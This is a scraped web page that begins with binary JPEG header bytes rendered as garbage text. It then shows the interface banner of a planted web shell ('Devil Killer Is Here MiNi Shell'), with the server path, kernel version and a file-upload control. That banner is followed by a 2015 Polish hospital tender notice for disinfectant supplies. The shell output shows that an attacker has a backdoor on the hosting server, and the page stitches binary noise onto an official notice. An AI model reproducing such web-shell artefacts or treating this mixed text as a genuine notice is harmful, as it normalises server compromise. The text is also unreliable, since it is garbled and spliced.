JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/178965-N-2015.html

<p class="kh_header"><b>Wysokie Mazowieckie: Zakup środków dezynfekcyjnych</b><br>
<b>Numer ogłoszenia: 178965 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Ogólny w Wysokiem Mazowieckiem , ul. Szpitalna 5, 18-200 Wysokie Mazowieckie, woj. podlaskie, tel. 086 4775501, faks 086 2752047.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwysmaz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków dezynfekcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup środków dezynfekcyjnych  dla potrzeb Szpitala  Ogólnego w Wysokiem Mazowieckiem . Oferent przystępujący do przetargu może przystąpić do całości zamówienia lub do danego pakietu zachowując numer ustalony przez Zamawiającego . Oferty cząstkowe będą odrzucone . 
 
1. Zamawiający  dopuszcza możliwość składania ofert częściowych .

2. Opis przedmiotu zamówienia : 

Przedmiot zamówienia składa się z następujących pakietów : 

Pakiet nr 1 : Dezynfekcja narzędzi chirurgicznych , endoskopów  
Pakiet nr 2 : Dezynfekcja powierzchni 
Pakiet nr 3 : Maszynowe mycie i dezynfekcja endoskopów i sprzętu 
Pakiet nr 4 : Mycie i dezynfekcja skóry , błon śluzowych i rąk 
Pakiet nr 5 : Maszynowe mycie i dezynfekcja narzędzi i sprzętu medycznego 
Pakiet nr 6 : Preparat do odtłuszczania skóry pacjenta 

Szczegółowy opis przedmiotu zamówienia zawiera Załącznik Nr 1 , który jest integralna częścią Specyfikacji Istotnych Warunków Zamówienia ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają 
   obowiązek ich  tj. zezwolenia na wykonywanie działalności gospodarczej w zakresie określonym w Ustawie z 
   dnia 06 września 2001r. z późniejszymi zmiana art. 72 pkt. 1 Zamawiający wymaga aby Wykonawca posiadał 
   Koncesję Hurtowni Farmaceutycznej na obrót produktami leczniczymi (preparaty do dezynfekcji rąk , skóry i 
   błon śluzowych ) - dotyczy Pakietu nr 4 .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">G.1)Zamawiający wymaga dostarczenia katalogu , prospektu lub folderu w języku polskim każdego 
       zaoferowanego Przedmiotu zamówienia zawierający opis składu jakościowego , ilościowego i spektrum    
       działania . 
G.2)Zamawiający wymaga, aby skuteczność (stężenie, spektrum i czas) działania proponowanych preparatów 
       do dezynfekcji narzędzi i powierzchni, oprócz ulotek informacyjnych, prospektów i instrukcji użycia były 
       potwierdzone dokumentami z wykonanych badań potwierdzających skuteczność produktów     
       dezynfekcyjnych wykonanych metodami uznanymi międzynarodowo lub opisanymi w Polskich Normach 
       lub innymi metodami zaakceptowanymi przez Prezesa Urzędu Rejestracji Produktów Leczniczych 
       Wyrobów Medycznych i Produktów Biobójczych lub opinią PZH - zamawiający wymaga dostarczenia 
       dokumentów z wykonanych badań dotyczących skuteczności mikrobiologicznej, potwierdzonych za 
       zgodność z oryginałem przez wytwórcę lub zaakceptowanego przez wytwórcę dystrybutora oferowanego 
       produktu.
G.3)Zamawiający wymaga, aby skuteczność mikrobójcza preparatów dezynfekcyjnych była potwierdzona 
       metodami przewidzianymi do określania skuteczności środków właściwych dla danej grupy użytkowników 
       (obszar medyczny) i danego zastosowania - oferent zobowiązany  jest dostarczyć dokument z 
       przeprowadzonych badań .. 
G.4)Zamawiający wymaga dostarczenia w ofercie kart charakterystyki oferowanych produktów w języku 
       polskim wydaną przez producenta oferowanego przedmiotu zamówienia. 
G.5)Atest dopuszczający dezynfekcję powierzchni kontaktujących się z żywnością dotyczy pakietu nr 2 . 
G.6)Pozytywna opinia Instytutu Matki i Dziecka dotyczy pakietu nr 2 , poz. 2 . 
G.7)Pozytywna opinia kliniczna do dezynfekcji powierzchni w oddziale pediatrycznym dotyczy pakietu nr 2 , 
        poz. 3 .   
G.8)Zamawiający wymaga dokumentów dopuszczających do obrotu oferowanych produktów .</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>V. Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków

1.O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają 
   obowiązek ich  tj. zezwolenia na wykonywanie działalności gospodarczej w zakresie określonym w Ustawie z 
   dnia 06 września 2001r. z późniejszymi zmiana art. 72 pkt. 1 Zamawiający wymaga aby Wykonawca posiadał 
   Koncesję Hurtowni Farmaceutycznej na obrót produktami leczniczymi (preparaty do dezynfekcji rąk , skóry i 
   błon śluzowych ) - dotyczy Pakietu nr 4 . 
2)posiadania wiedzy i doświadczenia,
3)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4)sytuacji ekonomicznej i finansowej,
 
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania 
    zamówienia zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru 
    prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
    zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności 
    przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
    zasobów na potrzeby wykonania zamówienia.

3.Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt. 2, odpowiada solidarnie z Wykonawcą 
   za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie 
   zasobów nie ponosi winy.

4.Warunki oraz opis sposobu dokonania oceny ich spełnienia mają na celu   weryfikowanie zdolności wykonawcy 
    do należytego wykonania niniejszego zamówienia. Wykonawcy, którzy nie wykażą spełnienia warunków 
    udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu .

5.Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie 
   art. 24 ust. 1 , 2 i 2a  Prawa zamówień publicznych.

6.Ofertę wykonawcy wykluczonego uważa się za odrzuconą.

7. Zamawiający odrzuca ofertę, jeżeli:

1)jest niezgodną z ustawą.
2)jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 
   Prawa zamówień publicznych.
3)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej 
   konkurencji.
4)zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
5)została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
6)zawiera błędy w obliczeniu ceny.
7)wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której
   mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych
8)jest nieważna na podstawie odrębnych przepisów,

8.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę 
   w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia  niespełnia . 

VI. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia 
      warunków udziału w postępowaniu

A. Na ofertę składają się następujące dokumenty i załączniki:
A.1)Formularz cenowy - wypełniony i podpisany przez wykonawcę - Załącznik nr 1
A.2)Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa Zamówień Publicznych 
       - Załącznik nr 2
A.3)Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa 
       Zamówień Publicznych - Załącznik nr 3
A.4)Oświadczenie dotyczące grupy kapitałowej z art. 26 ust. 2d Prawa Zamówień Publicznych - Załącznik nr 4 
A.5)Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie 
        wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
A.6)Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Załącznik nr 5

B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust 1  
     Prawa zamówień publicznych wykonawca składa następujące dokumenty:

B.1)Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli 
       odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia 
       w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu 
       składania ofert o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert , a w 
       stosunku do osób fizycznych  oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy .


C.  W celu oceny spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt. 1) do 3) 
      ustawy Pzp, należy złożyć następujące dokumenty:

C.1)Koncesja , zezwolenie lub licencja - dotyczy pakietu nr 4 . 

D. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w  art. 22 ust. 1 pkt. 4) ustawy 
     Pzp, należy złożyć następujące dokumenty :

Nie dotyczy .

E. Postanowienia dotyczące składania dokumentów przez Wykonawców mających siedzibę lub miejsce 
     zamieszkania poza terytorium Rzeczypospolitej Polskiej

E.1)Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast 
       dokumentów, o których mowa w pkt.B.1),  C.1) składa dokument lub dokumenty, wystawione w kraju, w 
       którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed 
    upływem terminu składania ofert.

E.2)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentów, wskazanych w pkt.  E.1) , zastępuje się je dokumentem 
       zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, 
       złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
       gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę 
       lub miejsce zamieszkania, lub przed notariuszem - wystawionych nie wcześniej niż w terminach określonych 
       w pkt.  E.1) .

E.3)W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce 
       zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych 
       organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub
       miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego 
       dokumentu.

F. W przypadku, kiedy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia 
     (konsorcjum  spółka cywilna), musi ona spełniać następujące warunki :

F.1)Oferta winna być podpisana przez ustanowionego pełnomocnika do reprezentowania w postępowaniu lub do 
       reprezentowania w postępowaniu i zawarcia umowy.
F.2)Stosowne pełnomocnictwo / upoważnienie wymaga podpisu prawnie upoważnionych przedstawicieli każdego 
       z wykonawców występujących wspólnie - należy załączyć do oferty. Pełnomocnictwo należy złożyć w formie
       oryginału lub notarialnie poświadczonej kopii.
F.3)Oferta winna zawierać: oświadczenia i dokumenty opisane w VI dla każdego wykonawcy z osobna, pozostałe 
       dokumenty składane są wspólnie.

G. W celu potwierdzenia, że oferowane dostawy, usługi, lub roboty budowlane odpowiadają wymaganiom 
     określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć 
     następujące dokumenty :
G.1)Zamawiający wymaga dostarczenia katalogu , prospektu lub folderu w języku polskim każdego 
       zaoferowanego Przedmiotu zamówienia zawierający opis składu jakościowego , ilościowego i spektrum    
       działania . 
G.2)Zamawiający wymaga, aby skuteczność (stężenie, spektrum i czas) działania proponowanych preparatów 
       do dezynfekcji narzędzi i powierzchni, oprócz ulotek informacyjnych, prospektów i instrukcji użycia były 
       potwierdzone dokumentami z wykonanych badań potwierdzających skuteczność produktów     
       dezynfekcyjnych wykonanych metodami uznanymi międzynarodowo lub opisanymi w Polskich Normach 
       lub innymi metodami zaakceptowanymi przez Prezesa Urzędu Rejestracji Produktów Leczniczych 
       Wyrobów Medycznych i Produktów Biobójczych lub opinią PZH - zamawiający wymaga dostarczenia 
       dokumentów z wykonanych badań dotyczących skuteczności mikrobiologicznej, potwierdzonych za 
       zgodność z oryginałem przez wytwórcę lub zaakceptowanego przez wytwórcę dystrybutora oferowanego 
       produktu.
G.3)Zamawiający wymaga, aby skuteczność mikrobójcza preparatów dezynfekcyjnych była potwierdzona 
       metodami przewidzianymi do określania skuteczności środków właściwych dla danej grupy użytkowników 
       (obszar medyczny) i danego zastosowania - oferent zobowiązany  jest dostarczyć dokument z 
       przeprowadzonych badań .. 
G.4)Zamawiający wymaga dostarczenia w ofercie kart charakterystyki oferowanych produktów w języku 
       polskim wydaną przez producenta oferowanego przedmiotu zamówienia. 
G.5)Atest dopuszczający dezynfekcję powierzchni kontaktujących się z żywnością dotyczy pakietu nr 2 . 
G.6)Pozytywna opinia Instytutu Matki i Dziecka dotyczy pakietu nr 2 , poz. 2 . 
G.7)Pozytywna opinia kliniczna do dezynfekcji powierzchni w oddziale pediatrycznym dotyczy pakietu nr 2 , 
        poz. 3 .   
G.8)Zamawiający wymaga dokumentów dopuszczających do obrotu oferowanych produktów .



H. Postanowienia dotyczące składanych dokumentów

H.1)Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za zgodność 
       z oryginałem przez wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem  za zgodność 
       z oryginałem.
H.2)Oferta, wszystkie wymagane załączniki, składane dokumenty oraz oświadczenia podpisane przez 
       upoważnionego przedstawiciela wykonawcy wymagają załączenia właściwego pełnomocnictwa lub 
       umocowania prawnego.
H.3)Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski .
H.4)Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie 
       wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości , co do jej 
       prawdziwości .
H.5)W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku 
       podmiotów, o których mowa w pkt. H.6), kopie dokumentów dotyczących każdego z tych podmiotów winny 
       być poświadczane za zgodność z oryginałem przez te podmioty.
H.6)Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C i D polega na zasobach innych 
       podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, zobowiązany jest wykazać, że w 
       stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez 
       złożenie razem z ofertą dokumentów wymienionych w pkt. A.3) oraz pkt. od B.1) dotyczących każdego z tych 
       podmiotów.
H.7)Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C i D polega na zasobach innych
        podmiotów w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu 
        niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi 
        podmiotami gwarantuje rzeczywisty dostęp do ich zasobów do oferty należy dołączyć dokumenty dotyczące:
zakresu dostępnych wykonawcy zasobów innego podmiotu,
sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wynagrodzenie , o którym mowa  w § 5 ust. 1 Zamawiający zastrzega sobie niezmienność cen przez okres trwania umowy . Ceny mogą ulec zmianie w przypadku: zmiany stawki VAT z dniem wejścia w życie odpowiedniego aktu prawnego zmieniającego stawkę VAT , zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 -5 ustawy z dnia 10  października 2002r o minimalnym wynagrodzeniu za pracę, zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwysmaz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Ogólny , ul. Szpitalna 5 , 18 - 200 Wysokie Mazowieckie - pokój 110 lub za zaliczeniem pocztowym - cena 100 zł..</p>
